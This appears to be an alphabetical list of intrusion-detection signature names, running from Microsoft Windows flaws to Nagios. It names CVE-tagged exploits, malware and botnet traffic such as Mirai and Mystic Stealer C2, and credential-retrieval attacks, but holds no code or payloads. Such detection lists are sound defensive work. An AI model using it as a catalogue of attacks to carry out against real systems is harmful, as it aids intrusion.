Microsoft-Windows-X.509-Certificate-Validation-Denial-Of-Service
Microsoft-Windows-XP-Large-Image-Resize-DoS
Microsoft-Winhlp32-Compressed-Phrase-Integer-Overflow
Microsoft-WINS-DoS
Microsoft-WINS-Memory-Overwrite-CVE-2008-1451
Microsoft-WINS-Server-WPAD-Registration-Spoofing
Microsoft-WINS-Service-Failed-Response-CVE-2011-1248
Microsoft-WMI-Administrative-Tools-ActiveX-Control
Microsoft-WMITools-ActiveX-Control-CVE-2010-3973
Microsoft-WMP-CVE-2010-2745
Microsoft-Word-Crafted-Smarttag-Record-Code-Execution
Microsoft-Word-Dpcallout-RTF-Control-Word-Handling-Buffer-Overflow
Microsoft-Word-dppolycount-RTF-Control-Word-Handling-Integer-Overflow
Microsoft-Word-Fcplcffldmom-Memory-Corruption
Microsoft-Word-File-Information-Memory-Corruption
Microsoft-Word-Font-Table-Remote-Code-Execution-CVE-2023-21716
Microsoft-Word-GLB-File-Parsing-Out-of-Bounds-Write
Microsoft-Word-Global-Array-Index-Heap-Overflow
Microsoft-Word-HTML-Linked-Objects-Memory-Corruption-CVE-2010-1903
Microsoft-Word-Malformed-Index-Code-Execution
Microsoft-Word-Malformed-String-Memory-Corruption
Microsoft-Word-Mso.dll-Lscreateline-Memory-Corruption
Microsoft-Word-RCE-Vulnerability-CVE-2015-0097
Microsoft-Word-Remote-Code-Execution-Vulnerability-CVE-2024-21379
Microsoft-Word-RTF-Bitmap-Biwidth-Biheight-Heap-Buffer-Overflow
Microsoft-Word-RTF-Drawing-Object-Parsing-Vulnerability
Microsoft-Word-RTF-Mismatch-CVE-2012-0183
Microsoft-Word-RTF-Parsing-Buffer-Overflow-CVE-2010-1902
Microsoft-Word-RTF-Parsing-Engine-Memory-Corruption-CVE-2010-1901
Microsoft-Word-RTF-Parsing-Stack-Exhaustion
Microsoft-Word-RTF-Remote-Code-Execution-CVE-2014-1761
Microsoft-Word-RTF-RTF-Object-Parsing-Memory-Corruption
Microsoft-Word-Security-Feature-Bypass-CVE-2024-49033
Microsoft-Word-Sprmsdyatop-Memory-Corruption
Microsoft-Word-Use-After-Free-CVE-2011-1983
Microsoft-WordPad-Embedded-COM-Code-Execution
Microsoft-WordPad-Text-Converter-Buffer-Overflow
Microsoft-WordPad-Text-Converter-CVE-2010-2563
Microsoft-WordPad-Word-Converter-Xst-Structure-Buffer-Overflow
Microsoft-Wordperfect-5.x-Converter-Buffer-Overflow
Microsoft-Works-File-Converter-WPS-File-Field-Length-Stack-Overflow
Microsoft-Works-File-Converter-WPS-FileSectionHeaderIndexTable-StackOF
Microsoft-Works-FileConverter-WPS-FileSectionLengthHeaders-MemCorrupt
Microsoft-Works-WkImgSrv.dll-ActiveX-Vulnerability
Microsoft-WPAD-Proxy-Discovery-Privilege-Escalation
Microsoft-WPS-Converter-Heap-Overflow-Vulnerability
Microsoft-WSDAPI-Memory-Corruption-MS09-063
Microsoft-XML-Core-Services-Content-Parsing-Memory-Corruption
Microsoft-XML-Core-Services-CVE-2017-0024
Microsoft-Xml-Core-Services-Integer-Truncation-Memory-Corruption
Microsoft-XML-Core-Services-Memory-Corruption-CVE-2010-2561
Microsoft-Xml-Core-Services-Msxml-Header-Request-Information-Disclosure
Microsoft-Xml-Core-Services-ParseError-DOM-Object-Information-Disclosure
Microsoft-Xml-Core-Services-Remote-Code-Execution-Vulnerability
Microsoft-XML-Editor-External-Entities-Resolution-CVE-2011-1280
Microsoft-XMLHTTP-ActiveX-Control-Code-Execution
Microsoft.NET-Iriparsing-Remote-Code-Execution
Microsoft_Edge_Memory_Corruption_Vulnerability_CVE-2019-0810
Microsoft_Edge_Memory_Corruption_Vulnerability_CVE-2019-0812
Microsoft_Edge_Memory_Corruption_Vulnerability_CVE-2019-0860
Microsoft_Edge_Out_Of_Bound_Vulnerability_CVE-2019-0592
Microsoft_Edge_Out_Of_Bound_Vulnerability_CVE-2019-0770
Microsoft_Edge_Out_Of_Bound_Vulnerability_CVE-2019-0771
Microsoft_Edge_Out_Of_Bound_Vulnerability_CVE-2019-0990
Microsoft_Edge_Out_Of_Bound_Vulnerability_CVE-2019-1002
Microsoft_Edge_Out_Of_Bound_Vulnerability_CVE-2019-1023
Microsoft_Edge_Security_Bypass_Vulnerability_CVE-2019-0612
Microsoft_Edge_Type_Confusion_Vulnerability_CVE-2019-0639
Microsoft_Edge_Type_Confusion_Vulnerability_CVE-2019-0769
Microsoft_Edge_Type_Confusion_Vulnerability_CVE-2019-0773
Microsoft_Edge_Type_Confusion_Vulnerability_CVE-2019-0829
Microsoft_Edge_Type_Confusion_Vulnerability_CVE-2019-0911
Microsoft_Edge_Type_Confusion_Vulnerability_CVE-2019-0989
Microsoft_Edge_Type_Confusion_Vulnerability_CVE-2019-0991
Microsoft_Edge_Type_Confusion_Vulnerability_CVE-2019-0992
Microsoft_Edge_Type_Confusion_Vulnerability_CVE-2019-0993
Microsoft_Edge_Type_Confusion_Vulnerability_CVE-2019-1003
Microsoft_Edge_Type_Confusion_Vulnerability_CVE-2019-1024
Microsoft_Edge_Type_Confusion_Vulnerability_CVE-2019-1051
Microsoft_Edge_Type_Confusion_Vulnerability_CVE-2019-1139
Microsoft_Edge_Type_Confusion_Vulnerability_CVE-2019-1140
Microsoft_Edge_Type_Confusion_Vulnerability_CVE-2019-1141
Microsoft_Edge_Type_Confusion_Vulnerability_CVE-2019-1195
Microsoft_Edge_Type_Confusion_Vulnerability_CVE-2019-1196
Microsoft_Edge_Type_Confusion_Vulnerability_CVE-2019-1197
Microsoft_Edge_Type_Confusion_Vulnerability_CVE-2019-1307
Microsoft_Edge_Type_Confusion_Vulnerability_CVE-2019-1308
Microsoft_Edge_Type_Confusion_Vulnerability_CVE-2019-1366
Microsoft_Edge_Type_Confusion_Vulnerability_CVE-2020-1219
Microsoft_Edge_Use_After_Free_Vulnerability_CVE-2019-0609
Microsoft_Edge_Use_After_Free_Vulnerability_CVE-2019-0806
Microsoft_Edge_Use_After_Free_Vulnerability_CVE-2019-0926
Microsoft_Edge_Use_After_Free_Vulnerability_CVE-2019-0940
Microsoft_Edge_Use_After_Free_Vulnerability_CVE-2019-1052
Microsoft_Exchange_Server-Insecure_Deserialization_Vulnerability_CVE-2021-26857
Microsoft_Exchange_Server-Insecure_Deserialization_Vulnerability_CVE-2021-28482
Microsoft_Exchange_Server-Remote_Code_Execution_CVE-2021-28480
Microsoft_Internet_Explorer_Use_After_Free_Vulnerability_CVE-2019-1367
Microsoft_Office_Directory_Traversal_Vulnerability_CVE-2019-0801
Microsoft_Outlook_Use_After_Free_Vulnerability_CVE-2019-1199
Microsoft_Scripting_Engine_Memory_Corruption_Vulnerability_CVE-2020-1380
Microsoft_Scripting_Engine_Memory_Corruption_Vulnerability_CVE-2020-1570
Microsoft_Scripting_Engine_Memory_Corruption_Vulnerability_CVE-2021-31959
Microsoft_Sharepoint_Deserialization_Vulnerability_CVE-2022-38053
Microsoft_Sharepoint_Remote_Code_Execution_Vulnerability_CVE-2019-1257
Microsoft_Sharepoint_Remote_Code_Execution_Vulnerability_CVE-2019-1295
Microsoft_Sharepoint_Remote_Code_Execution_Vulnerability_CVE-2019-1296
Microsoft_Sharepoint_Remote_Code_Execution_Vulnerability_CVE-2020-16952
Microsoft_Sharepoint_Remote_Code_Execution_Vulnerability_CVE-2021-31181
Microsoft_Sharepoint_Remote_Code_Execution_Vulnerability_CVE-2021-34467
Microsoft_Sharepoint_Remote_Code_Execution_Vulnerability_CVE-2021-40487
Microsoft_Windows_Buffer_Over_Read_Vulnerability_CVE-2019-0758
Microsoft_Windows_CryptoAPI_Spoofing_Vulnerability_CVE-2020-0601
Microsoft_Windows_Information_Disclosure_Vulnerability_CVE-2019-0703
Microsoft_Windows_Integer_Overflow_Vulnerability_CVE-2019-0885
Microsoft_Windows_Integer_Overflow_Vulnerability_CVE-2020-1301
Microsoft_Windows_Integer_Underflow_Issue_Vulnerability_CVE-2019-0903
Microsoft_Windows_Memory_Corruption_Vulnerability_CVE-2020-0664
Microsoft_Windows_Out_Of_Bounds_Vulnerability_CVE-2020-0609
Microsoft_Windows_Out_Of_Bound_Vulnerability_CVE-2020-1284
Microsoft_Windows_SMBv3_Remote_Code_Execution_Vulnerability_CVE-2020-0796
Microsoft_Word_Out_Of_Bound_Write_Vulnerability_CVE-2019-1201
Microsys-PROMOTIC-Pmbase64decode-Buffer-Overflow
Microweber-CMS-Local-File-Inclusion
Mida-Solutions-eFramework-ajaxreq.php-Command-Injection
MikroTik-Router-OS-Buffer-Overflow-Vulnerability-CVE-2018-7445
MikroTik-RouterOS-Authentication-Bypass
MineBridge-Trojan-Infection-Traffic
Mini-Stream-Ripper-Buffer-Overflow
MinIO-Information-Disclosure-Vulnerability-CVE-2023-28432
Minishare-1.4.1-Buffer-Overflow
MiniUPnP-Denial-Of-Service
MiniUPnP-Stack-Based-Buffer-Overflow
Mirai-Botnet
mIRC-IRC-URI-Protocol-Handler-Buffer-Overflow
mIRC-PRIVMSG-Message-Processing-Buffer-Overflow
mIRC-URI-Handler-Remote-Code-Execution
MirrorBlast-Malware-Infection-Traffic
Mirth-Connect-Remote-Code-Execution-CVE-2023-43208
MISC-BOOTP-Hardware-Address-Length-Overflow
Miscrosoft-Edge-Information-Disclosure-Vulnerability-CVE-2017-0017
Miscrosoft-Edge-RCE-CVE-2017-0200
Miscrosoft-Office-RCE-CVE-2017-0199
Miscrosoft-Outlook-RCE-CVE-2017-0106
MIT-Kerberos-5-Build_Principal_va-Denial-Of-Service
MIT-Kerberos-5-Invalid-RFC-1964-Token-Denial-of-Service
MIT-Kerberos-5-Kadmind-Kadm5_Policy-Denial-Of-Service
MIT-Kerberos-5-Kadmind-Null-Pointer-Dereference
MIT-Kerberos-5-KDC-Null-Pointer-Dereference
MIT-Kerberos-5-KDC-prep_reprocess_req-Null-Pointer-Dereference
MIT-Kerberos-5-KDC-TCP-Handling-Denial-of-Service
MIT-Kerberos-5-kpasswd-UDP-Ping-Pong-Denial-Of-Service
MIT-Kerberos-5-Recvauth-Invalid-Memory-Access
MIT-Kerberos-5-SPNEGO-Acceptor-acc_ctx_cont-Denial-of-Service
MIT-Kerberos-Asn1DecodeGeneraltime-Uninitialized-Pointer-Reference
MIT-Kerberos-Kadmind-Rename-Principal-Buffer-Overflow
MIT-Kerberos-Kadmind-RPC-Library-RPCSEC-GSS-Authentication-BOF
MIT-Kerberos-Kadmind-RPC-Library-Uninitialized-Pointer
MIT-Kerberos-KDC-Authentication-Denial-Of-Service
MIT-Kerberos-KDC-Cross-Realm-Referral-Denial-of-Service
MIT-Kerberos-KDC-Null-Pointer-Denial-Of-Service
MIT-Kerberos-KDC-Ticket-Validation-Double-Free-Memory-Corruption
MIT-Kerberos-V5-Kadmind-Klog_vsyslog-Server-Stack-Buffer-Overflow
MIT-Kerberos-V5-KDC-Krb5_Unparse_Name-Heap-Overflow
Mitel-MiCollab-SQL-Injection-CVE-2024-35286
Mitel-MiVoice-Connect-Remote-Code-Execution-CVE-2022-29499
Mitel-SIP-Phone-Argument-Injection-CVE-2024-41710
Mitsubishi-Electric-E-Designer-Becomlislave-Status_Bit-Stack-Buffer-Overflow
Mitsubishi-Electric-E-Designer-Setupalarm-Font-Stack-Buffer-Overflow
Mitsubishi-MC-WorkX-8.02-ActiveX-Control-Vulnerability
Mitsubishi-MX-ActiveX-Control-ActUWzd.dll-Buffer-Overflow
Mlflow-Experiments-Local-File-Inclusion-CVE-2023-6909
Mlflow-Experiments-Local-File-Inclusion-CVE-2024-2928
MnoGoSearch-Search-Cgi-Tmplt-Parameter-BOF
MnoGoSearch-Search-Cgi-Ul-Parameter-BOF
MnoGoSearch-Search-Cgi-Wf-Parameter-BOF
Mobile-Mouse-RCE
MobileIron-Remote-Code-Execution-CVE-2020-15505
Mocbot
Mocbot-Botnet
Modbus-SCADA-Directory-Traversal
MODx-Reflect-Base-File-Inclusion
MODX-Revolution-phpthumb.php-CVE-2018-1000207
MoinMoin-Remote-Code-Execution
Momentum-Botnet
Mongo-Express-Remote-Code-Execution-CVE-2019-10758
MongoDB-Unauthenticated-Remote-Database-Drop
Monitorr-Unauthenticated-Remote-Code-Execution
Monkif-Bot
MONSOON-Control-Traffic
Montala-Limited-ResourceSpace-Index.php-Cross-Site-Scripting
Montala-Limited-ResourceSpace-Tiles.php-Arbitrary-File-Deletion
Montala-ResourceSpace-User_Functions-SQL-Injection
Moodle-Admin-Shell-Upload
Moodle-Authenticated-Spelling-Binary-RCE
Moodle-Calculated-Question-Remote-Code-Execution-CVE-2018-1133
Moodle-Calculated-Question-Types-Remote-Code-Execution-CVE-2024-43425
Moodle-Remote-Command-Execution
Moodle-SpellChecker-Path-Authenticated-RCE
Moodle-Teacher-Enrollment-Privilege-Escalation-To-RCE
Morcut-Malware
Mosca-MQTT-Invalid-Regex-Denial-Of-Service-CVE-2018-11615
MosConfig-Absolute-Path-Remote-File-Include-Vulnerability
Motorola-Timbuktu-Crafted-Login-Request-Buffer-Overflow
Motorola-Timbuktu-Pro-PlughNTCommand-Stack-Based-Buffer-Overflow
Motorola-WR850G-Authentication-Bypass
Movable-Type-Remote-Code-Execution
MOVEit-Transfer-SQL-Injection-Post-Exploit
MOXA-Device-Credential-Retrieval
MOXA-Device-Manager-Tool-Buffer-Overflow
Moxa-MXview-Path-Traversal-CVE-2021-38452
MOXA-SoftCMS-Cgi-Program-SQL-Injection
Mozart-Loader-Traffic
Mozi-Botnet-Traffic
Mozilla-BMP-Parsing-Integer-Overflow
Mozilla-Browsers-JavaScript-Argument-Passing-Code-Execution
Mozilla-Browsers-JavaScript-InstallVersion-Invalid-Argument-Type
Mozilla-Browsers-onUnload-Event-Handler-Memory-Corruption
Mozilla-CSS-Border-Memory-Corruption
Mozilla-Firefox-And-Thunderbird-Sensor.dll-Insecure-Library-Loading
Mozilla-Firefox-Animated-PNG-Processing-Integer-Overflow
Mozilla-Firefox-Browser-Engine-Memory-Corruption
Mozilla-Firefox-Built-In-PDF-Viewer-Same-Origin-Policy-Bypass
Mozilla-Firefox-Chrome-Page-Privilege-Restriction-Bypass
Mozilla-Firefox-Chrome-URL-Information-Disclosure
Mozilla-Firefox-Cleartextrun-Function-Memory-Corruption
Mozilla-Firefox-Constructframe-Memory-Corruption
Mozilla-Firefox-Createimagebitmap-Integer-Overflow
Mozilla-Firefox-Cross-Domain-Information-Disclosure
Mozilla-Firefox-CVE-2014-1510-Webidl-Implementation-Privilege-Escalation
Mozilla-Firefox-document.write-And-DOM-Insertions-Memory-Corruption
Mozilla-Firefox-Domnoderemoved-Memory-Corruption
Mozilla-Firefox-Domsvglength-Reflected-Attribute-Use-After-Free
Mozilla-Firefox-enablePrivilege-Vulnerable-Function
Mozilla-Firefox-Floating-Point-Number-Conversion-Memory-Corruption
Mozilla-Firefox-HTTP-Index-Format-File-Out-Of-Bounds-Read
Mozilla-Firefox-Iconurl-Arbitrary-JavaScript-Execution
Mozilla-Firefox-Iframe-Style-Change-Handling-Code-Execution
Mozilla-Firefox-Information-Disclosure-CVE-2013-1675
Mozilla-Firefox-InstallTrigger-DoS
Mozilla-Firefox-JavaScript-Array.splice-Memory-Corruption
Mozilla-Firefox-JavaScript-Function-Focus-Buffer-Overflow
Mozilla-Firefox-Jit-Code-Allocation
Mozilla-Firefox-Jit-Code-Allocation-2
Mozilla-Firefox-Jit-Compiler-Type-Confusion
Mozilla-Firefox-Layout-Frame-Constructor-Memory-Corruption
Mozilla-Firefox-Multiple-URI-Handlers-Command-Execution
Mozilla-Firefox-Navigator-Remote-Code-Execution
Mozilla-Firefox-nsPropertyTable-PropertyList-Memory-Corruption
Mozilla-Firefox-nsSVGValue-Denial-Of-Service
Mozilla-Firefox-nsTreeRange-Use-After-Free
Mozilla-Firefox-Object-Mchannel-Use-After-Free
Mozilla-Firefox-Object-Tag-Null-Dereference
Mozilla-Firefox-onreadystatechange-Use-After-Free
Mozilla-Firefox-onUnload-SSL-Certificate-Spoofing
Mozilla-Firefox-PKCS11-Module-Installation-Code-Execution
Mozilla-Firefox-Plugin-Parameter-Array-Dangling-Pointer
Mozilla-Firefox-Prototype-Pollution-CVE-2022-1802
Mozilla-Firefox-Remote-Code-Execution
Mozilla-Firefox-Resource-URL-Handling-Directory-Traversal
Mozilla-Firefox-Sharedworker-Messageport-Use-After-Free
Mozilla-Firefox-Sidebar-Panel-Arbitrary-Code-Execution
Mozilla-Firefox-SVG-Animation-Use-After-Free-CVE-2016-9079
Mozilla-Firefox-SVG-Element-Processing-Memory-Corruption
Mozilla-Firefox-Table-Use-After-Free-CVE-2017-5404
Mozilla-Firefox-Tag-Order-Memory-Corruption
Mozilla-Firefox-Thunderbird-SeaMonkey-IDBKeyRange-Use-After-Free
Mozilla-Firefox-Top-Level-Script-Object-Memory-Corruption
Mozilla-Firefox-Tracemonkey-Escape-Function-Memory-Corruption
Mozilla-Firefox-Unicode-Data-Denial-Of-Service
Mozilla-Firefox-Unicode-Sequence-Handling-Buffer-Overflow
Mozilla-Firefox-URI-Handling-Vulnerability
Mozilla-Firefox-Utf8-Url-Handling-Stack-Buffer-Overflow
Mozilla-Firefox-Webassembly-Table-Integer-Underflow
Mozilla-Firefox-Webextensions-Settingcontent.Ms-Policy-Bypass
Mozilla-Firefox-WebGL-Integer-Overflow
Mozilla-Firefox-Woff-Font-Processing-Integer-Overflow
Mozilla-Firefox-XBL-Event-Handler-Tags-Removal-Memory-Corruption
Mozilla-Firefox-XML-Parser-Memory-Corruption-Denial-of-Service
Mozilla-Firefox-Xmlserializer-Use-After-Free
Mozilla-Firefox-Xraywrapper-Policy-Bypass
Mozilla-Firefox-XSL-Transformation-Memory-Corruption
Mozilla-Firefox-XUL-menupopup.menu-Null-Pointer-Dereference-DoS
Mozilla-Floating-Layer-Column-Layout-DoS
Mozilla-JavaScript-String-Replace-Buffer-Overflow
Mozilla-Multiple-Products-Array.reduceright-Integer-Overflow
Mozilla-Multiple-Products-Multiple-Location-Headers
Mozilla-Multiple-Products-Table-Frames-Memory-Corruption
Mozilla-Multiple-Products-WAV-Processing-Buffer-Overflow
Mozilla-Network-Security-Services-RSA-Signature-Forgery
Mozilla-Network-Security-Services-SSLv2-Client-Integer-Underflow
Mozilla-Non-Ascii-Hostname-BOF
Mozilla-NSS-Tls-Regexp-Buffer-Overflow
Mozilla-PDFjs-Fontfaceobject-Arbitrary-JavaScript-Code-Execution
Mozilla-Products-Animation-Timeline-Use-After-Free
Mozilla-Products-Ensurecachedattrparamarrays-Integer-Overflow
Mozilla-Products-IDN-Spoofing-Vulnerability
Mozilla-Products-MathML-Integer-Overflow
Mozilla-Products-Nscssvalue-Array-Index-Integer-Overflow
Mozilla-Products-Overflow-Event-Handling-Memory-Corruption
Mozilla-Products-QueryInterface-Method-Memory-Corruption
Mozilla-Products-SVG-Rendering-Engine-Integer-Overflow
Mozilla-Shell-Protocol-Validation
Mozilla-Soapparameter-Integer-Overflow-Vulnerability
Mozilla-SVG-Data-Processing-Memory-Corruption
MPack-Attack-Platform
MPlayer-For-Windows-Calloc-Integer-Overflow
MPlayer-Sami-Subtitle-Buffer-Overflow
MPlayer-TwinVQ-File-Handling-Buffer-Overflow
MS-appinstaller-URI-Scheme
MS-Asp-Net-Path-Validation-Authentication-Bypass-MS05-004
MS-Compressed-Folders-DUNZIP32-DLL-Buffer-Overflow-MS04-034
MS-Exchange-URL-Redirection-CVE-2014-6336
MS-Forefront-Threat-Management-Gateway-Client-Remote-Code-Execution
MS-Forefront-UAG-Default-Reflected-XSS
MS-Forefront-UAG-ExcelTable-Reflected-XSS
MS-Forefront-UAG-ExcelTable-Response-Splitting-XSS
MS-Forefront-UAG-Null-Session-Cookie-Crash-Vulnerability
MS-Forefront-UAG-Poisoned-Cup-Of-Code-Execution-Vulnerability
MS-Host-Integration-Server-Snabase.exe-Memory-Access-Error
MS-Ie-Async-Null-Object-Access-Remote-Code-Execution
MS-Ie-Frame-Iframe-Embed-Tag-Attribute-BOF-MS04-040
MS-Ie-HTML-Sanitization-Vulnerability-CVE-2013-1289
MS-Ie-JavaScript-Code-Execution-Vulnerability
MS-Ie-Layout-Memory-Corruption-Vulnerability-CVE-2012-1526
MS-Ie-Style-Tag-Comment-DoS
MS-IIS-HTTP-TRACK-Logging-Failure
MS-IIS-Server-WebDAV-Xml-Request-DoS-MS04-030
MS-Internet-Explorer-CVE_2012-1889
MS-Internet-Explorer-Memory-Corruption-Vulnerability-CVE-2013-3115
MS-Internet-Explorer-Memory-Corruption-Vulnerability-CVE-2013-3143
MS-Internet-Explorer-Memory-Corruption-Vulnerability-CVE-2013-3145
MS-Internet-Explorer-Memory-Corruption-Vulnerability-CVE-2013-3146
MS-Internet-Explorer-Memory-Corruption-Vulnerability-CVE-2013-3147
MS-Internet-Explorer-Memory-Corruption-Vulnerability-CVE-2013-3148
MS-Internet-Explorer-Memory-Corruption-Vulnerability-CVE-2014-0270
MS-Internet-Explorer-Memory-Corruption-Vulnerability-CVE-2014-0276
MS-Internet-Explorer-Memory-Corruption-Vulnerability-CVE-2014-0278
MS-Internet-Explorer-Select-Element-Remote-Code-Execution
MS-NetDDE-Remote-Buffer-Overflow-MS04-031
MS-NNTP-BOF-MS04-036
MS-Office-Xp-Url-BOF-MS05-005
MS-RPC-DCOM-Interface-DoS-MS03-039
MS-RPC-Endpoint-Mapper-DoS-MS03-010
MS-SCOM-Web-Console-XSS-Vulnerability-CVE-2013-0010
MS-Search-URI-Scheme
MS-Sharepoint-Workflowcodetypereferenceexpression-Insecure-Deserialization
MS-SMTP-Service-Ntlm-Null-Session-Authentication-Bypass-MS02-011
MS-SQL-Rdbms-Engine-Elevation-Of-Privilege-Vulnerability-CVE-2016-7250
MS-Visio-DXF-File-Buffer-Overflow-CVE-2012-1888
MS-Windows-DHCP-Server-Failover-Mfparsedhcpfailovermessage-Out-Of-Bounds-Read
MS-Windows-Msxml-Information-Disclosure-Vulnerability
MS-Windows-Print-Spooler-Service-Format-String-Vulnerability
MS-Windows-SMB-Transaction-BOF-MS05-011
MS-Windows-TrueType-Font-Parsing-Vulnerability-CVE-2012-0159
MS-Windows-Weak-Administrator-Password
MS-Word-Stack-Buffer-Overwrite-Vulnerability-CVE-2013-1324
MS-XML-Remote-Code-Execution-CVE-2018-8420
MS03-043
MSHTML_Engine_Memory_Corruption_Vulnerability_CVE-2020-1567
MSIE-Information-Disclosure-Vulnerability-CVE-2013-3908
MSIE-JSON-Array-Information-Disclosure-Vulnerability
MSIE-JSON-Parsing-Vulnerability-CVE-2013-3861
MSIE-Memory-Corruption-Vulnarability-CVE-2013-3193
MSN-Messenger-Usage
MSN-WebMessenger-Usage
MSRPC-Big-Endian-Byte-Order-Used
MSRPC-Bind-Over-SMB2
MSRPC-CA-Alert-Notification-Server-RPC-Request-Buffer-Overflow
MSRPC-CA-Message-Engine-RPC-Server-Buffer-Overflow
MSRPC-CA-Products-Message-Engine-RPC-Server-Buffer-Overflow
MSRPC-Encryption-Usage
MSRPC-LSASS-DOS-MS09-059
MSRPC-Message-Queuing-Service-Queue-Name-String-Buffer-Overflow
MSRPC-Microsoft-Client-Service-For-NetWare-Memory-Corruption
MSRPC-Microsoft-Windows-RRAS-Memory-Corruption
MSRPC-Microsoft-Windows-Server-Service-Buffer-Overrun
MSRPC-Microsoft-Windows-Svcctl-ChangeServiceConfig2A-Memory-Corruption
MSRPC-NetrSendMessage-Usage
MSRPC-Novell-Client-nwspool.dll-EnumPrinters-Function-Stack-Buffer-Overflow
MSRPC-Novell-Client-Print-Provider-Buffer-Overflow
MSRPC-Novell-Client-Print-Provider-RPC-Stack-Buffer-Overflow
MSRPC-NTLMSSP-Authentication-Null-Session-Denial-Of-Service
MSRPC-PnP-GetDeviceList-And-GetDeviceListSize-BOF
MSRPC-PnP-GetDeviceList-Large-Output-Buffer-Denial-Of-Service
MSRPC-Rpcss-RemoteCreateInstance-Race-DoS
MSRPC-Samba-LSA-LsarAddPrivilegesToAccount-Buffer-Overflow
MSRPC-Samba-LSA-LsarLookupSids-Buffer-Overflow
MSRPC-Small-Fragments-Used
MSRPC-Windows-Local-Security-Authority-Username-Disclosure
MSRPC-Workstation-Service-Account-Name-Buffer-Overflow
MSRPC-Workstation-Service-Buffer-Overflow-MS06-070
MSRPC_CA-Arcserve-Backup-Db-Engine-Denial-Of-Service
MSRPC_CA-Arcserve-Backup-Tape-Engine-Denial-Of-Service
MSRPC_CA-BrightStor-Backup-Message-Engine-Opcode-269-Buffer-Overflow
MSRPC_CA-BrightStor-Backup-Tape-Engine-Message-Vsprintf-Log-Buffer-Overflow
MSRPC_CA-BrightStor-Backup-Tape-Engine-Opcode-191-Code-Execution-Vulnerability
MSRPC_CA-Multiple-Products-Alert-Notification-Server-Buffer-Overflow
MSSQL-MS-SQL-Server-Pre-Authentication-BOF
MSSQL-MS-SQL-Server-Sp_replwritetovarbin-BOF
MSSQL-NetBIOS-MS-SQL-Server-Xp-Displayparamstmt-BOF
MSSQL-NetBIOS-MS-SQL-Server-Xp-Enumresultset-BOF
MSSQL-NetBIOS-MS-SQL-Server-Xp-Peekqueue-BOF
MSSQL-NetBIOS-MS-SQL-Server-Xp-Printstatements-BOF
MSSQL-NetBIOS-MS-SQL-Server-Xp-Proxiedmetadata-BOF
MSSQL-NetBIOS-MS-SQL-Server-Xp-SetSQLSecurity-BOF
MSSQL-NetBIOS-MS-SQL-Server-Xp-Showcolv-BOF
MSSQL-NetBIOS-MS-SQL-Server-Xp-Updatecolvbm-BOF
MSSQL-Resolution-Service-Stack-Overflow
MSSQL-Server-2000-0x08-BOF
MSSQL_Microsoft-SQL-Server-Convert-Function-Buffer-Overflow
MSSQL_Microsoft-SQL-Server-INSERT-Statement-Buffer-Overflow
MSSQL_Microsoft-SQL-Server-Tds-Packet-Fragment-Handling-Vulnerability
MSWebDVD-Class-Null-Pointer-Assignment
Mujahideen-Secrets-Key-File
Multiple-AV-Vendor-Invalid-Archive-Checksum-Bypass
Multiple-Browser-Long-Unicode-DoS-Memory-Corruption
Multiple-Browser-Marquee-DoS-Memory-Corruption
Multiple-Browsers-Telnet-URI-Handler-File-Manipulation-Vulnerability
Multiple-DVR-Manufacturers-Configuration-Disclosure
Multiple-IPMI-Cipher-Zero-Vulnerabilities
Multiple-Mozilla-Products-Ogg-Vorbis-Decoding-Memory-Corruption
Multiple-Products-Libxml2-Xml-File-Processing-Long-Entity-Name-Buffer-Overflow
Multiple-Products-Malformed-Au-File-Divide-By-Zero-Denial-of-Service
Multiple-Schneider-Electric-Products-Denial-Of-Service
Multiple-Solarwinds-Orion-Getaccounts-SQL-Injections
Multiple-Vendor-CUPS-Administration-Interface-Cgi-Heap-Overflow
Multiple-Vendor-ICMP-Connection-Reset-Denial-Of-Service
Multiple-Vendor-ICMP-Path-Mtu-Denial-Of-Service
Multiple-Vendor-ICMP-Source-Quench-Denial-Of-Service
Multiple-Vendor-Libwpd-Wp3tablesgroup-Heap-Overflow
Multiple-Vendor-PDF-Reader-Catlog-Handling
Multiple-Vendor-Snmpv3-Hmac-Handling-Authentication-Bypass
Multiple-Vendor-TCP-Timestamp-Option-Denial-of-Service
Multiple-Vendors-Agentx-Receive-Stack-Buffer-Overflow
Multiple-Vendors-BSD-Telnetd-Encryption-Key-Buffer-Overflow
Multiple-Vendors-Calendar-Manager-RPC-Service-Memory-Corruption
Multiple-Vendors-CUPS-Hpgl-Filter-Remote-Code-Execution
Multiple-Vendors-DNS-DNSSEC-Response-Handling-Denial-Of-Service
Multiple-Vendors-DNS-NSEC3-Response-Handling-Denial-Of-Service
Multiple-Vendors-JS-Engine-Speculative-Execution-Jit-Information-Disclosure
Multiple-Vendors-Librpc.dll-Stack-Buffer-Overflow
Multiple-Vendors-Libspf2-DNS-Txt-Record-Parsing-Buffer-Overflow
Multiple-Vendors-Ntp-Mode-7-Denial-Of-Service
Mumblehard-Spambot
Mutiny-Arbitrary-File-Upload
Mutiny-Subnetmask-Injection
MW6-Technologies-Aztec-ActiveX-Control-Buffer-Overflow
MW6-Technologies-Barcode-ActiveX-Control-Buffer-Overflow
MW6-Technologies-Datamatrix-ActiveX-Control-Buffer-Overflow
MW6-Technologies-Maxicode-ActiveX-Control-Buffer-Overflow
MyBB-Admin-Control-Panel-Code-Injection
Mydooma-Backdoor
Myloader
mySCADA-myPRO-7-Hardcoded-Credentials
mySCADA-myPRO-CVE-2023-28384-Command-Injection
mySCADA-myPRO-CVE-2023-28400-Command-Injection
mySCADA-myPRO-CVE-2023-28716-Command-Injection
mySCADA-myPRO-Datafromviewscripts-Command-Injection
mySCADA-myPRO-Manager-Unauthenticated-Command-Injection-CVE-2024-47407
MySQL-And-MariaDB-Incorrect-Cast-Policy-Bypass-Vulnerability
MySQL-Authentication-Bypass
Mysql-Com_Table_Dump-Function-Stack-Overflow
MySQL-Create-Function-Command-Buffer-Overflow
MySQL-Failed-Login
MySQL-Login-Handshake-Information-Disclosure
MySQL-Msdos-Device-Name-DoS
MySQL-MySQL-Server-Date-Format-Function-Format-String
MySQL-MySQL-yaSSL-SSL-Hello-Message-Buffer-Overflow
MySQL-Server-Create-Function-Arbitrary-Code-Execution
MySQL-Server-Mysql-Func-Table-Library-Injection-Vulnerability
MySQL-Sun-MySQL-mysql_log-Format-String-Vulnerability
MySQL-XML-Functions-Scalar-Xpath-Denial-Of-Service
MySQL-yaSSL-CertDecoder::GetName-Buffer-Overflow
Mystic-Stealer-Malware-C2-Traffic
Mytob
Nagios-Command-Execution
Nagios-Core-Cgi-Process_cgivars-Off-By-One
Nagios-Core-Config-Manager-Tfpassword-SQL-Injection
Nagios-History.cgi-Parameter-Buffer-Overflow
Nagios-Log-Server-Audit-Log-And-Alert-History-Reflected-Cross-Site-Scripting
